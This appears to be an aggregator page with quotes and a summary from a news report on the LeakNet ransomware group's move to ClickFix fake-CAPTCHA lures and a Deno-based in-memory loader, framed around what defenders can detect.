"The key takeaway here is that both entry paths lead to the same repeatable post-exploitation sequence every time. That gives defenders something concrete to work with: known behaviors you can detect and disrupt at each stage, well before ransomware deployment, regardless of how LeakNet got in."
"The use of ClickFix to breach victims offers several advantages, the most significant being that it reduces dependence on third-party suppliers, lowers per-victim acquisition cost, and removes the operational bottleneck of waiting for valuable accounts to hit the market."
"In these attacks, the legitimate-but-compromised sites are used to serve fake CAPTCHA verification checks that instruct users to copy and paste a msiexec.exe command to the Windows Run dialog. The attacks are not confined to a specific industry vertical, instead casting a wide net to infect as many victims as possible."
LeakNet, a ransomware operation that emerged in November 2024, has shifted from traditional initial access methods like stolen credentials to adopting ClickFix social engineering tactics. This approach tricks users into running malicious commands through fake CAPTCHA checks on compromised websites, reducing dependence on third-party suppliers and lowering acquisition costs. The attacks employ a staged command-and-control loader built on Deno JavaScript runtime to execute payloads directly in memory. LeakNet follows a repeatable post-exploitation sequence regardless of entry method, providing defenders with concrete behavioral patterns to detect and disrupt before ransomware deployment. The group targets multiple industries broadly rather than specific verticals.
#leaknet-ransomware #clickfix-social-engineering #initial-access-tactics #deno-c2-loader #threat-detection
Read at The Hacker News
Unable to calculate read time
Collection
[
|
...
]